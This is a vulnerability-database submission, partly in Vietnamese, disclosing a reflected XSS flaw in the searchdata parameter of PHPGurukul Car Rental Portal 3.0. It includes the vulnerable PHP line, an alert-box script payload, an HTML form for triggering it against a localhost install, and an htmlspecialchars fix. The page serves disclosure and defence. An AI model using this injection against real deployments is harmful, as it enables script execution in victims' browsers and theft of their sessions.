Gửi #435179: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntaxthông tin

tiêu đềPHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax
Mô tả[XSS vulnerability] found in Car Rental Portal 3.0 - (search.php) Affected Project: Car Rental Portal Web: Php Vendor: PHPGurukul Official Website: (https://phpgurukul.com/car-rental-project-php-mysql-free-download/) Version: 3.0 Updated: 05 June 2024 Vulnerable file: /search.php Injection parameter: searchdata Size: 16.0 MB Sha256: 8a9ad60cf5f36e2c3c4a1ce6fed7438bb458a2d2489e2a1be60dbbdd481fdf8b Vulnerability Description: The issue arises because the `searchdata` parameter from the URL is being directly inserted into the value attribute of an HTML input element without proper sanitization. This allows an attacker to inject arbitrary HTML or JavaScript code leading to an XSS attack. Vulnerable code: <h1>Search Result of keyword "<?php echo $_POST['searchdata'];?>"</h1> Injection Payload Tested: We set `searchdata` to: "><script>alert('XSS')</script> Execution: When the browser parses this through a POST request, it executes the `<script>alert('XSS')</script>` code, resulting in a popup displaying `"XSS"`. <br /> Demonstration: Below is how `search.php` looks like: https://i.postimg.cc/mg6Vs6Vd/1.png As it is a POST request we need to use a file test_form.html with the following content to be able to trigger the XSS popup: <!DOCTYPE html> <html> <head> <title>Search Form</title> </head> <body> <form action="http://localhost:8000/carrental/search.php" method="POST"> <input type="text" name="searchdata" value='"><script>alert("XSS")</script>'> <input type="submit" value="Search"> </form> </body> </html> Then we have to open it on the browser: For example: file:///home/username/Desktop/test_form.html https://i.postimg.cc/nVYkzL09/2.png After submitting the payload using POST with the vulnerable parameter `searchdata` and the XSS payload `"><script>alert('XSS')</script>`, XSS is triggered: https://i.postimg.cc/t4fdfnCw/3.png Recommendation for Preventing XSS: To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters. Example: // Retrieve the search data using GET $searchData = isset($_GET['searchdata']) ? $_GET['searchdata'] : ''; // Escape the output to prevent XSS $safeSearchData = htmlspecialchars($searchData, ENT_QUOTES, 'UTF-8'); > One Click Can Change Everything: Be Secure.
Nguồn⚠️ https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Car%20Rental%20Portal%203.0%20-%20(search.php).md
Người dùng
 secuserx (UID 76735)
Đệ trình01/11/2024 01:17 (cách đây 2 những năm)
Kiểm duyệt01/11/2024 18:07 (17 hours later)
Trạng tháiđược chấp nhận
Mục VulDB282869 [PHPGurukul Car Rental Portal 1.0 /search.php searchdata Tập lệnh chéo trang]
điểm20

Interested in the pricing of exploits?

See the underground prices here!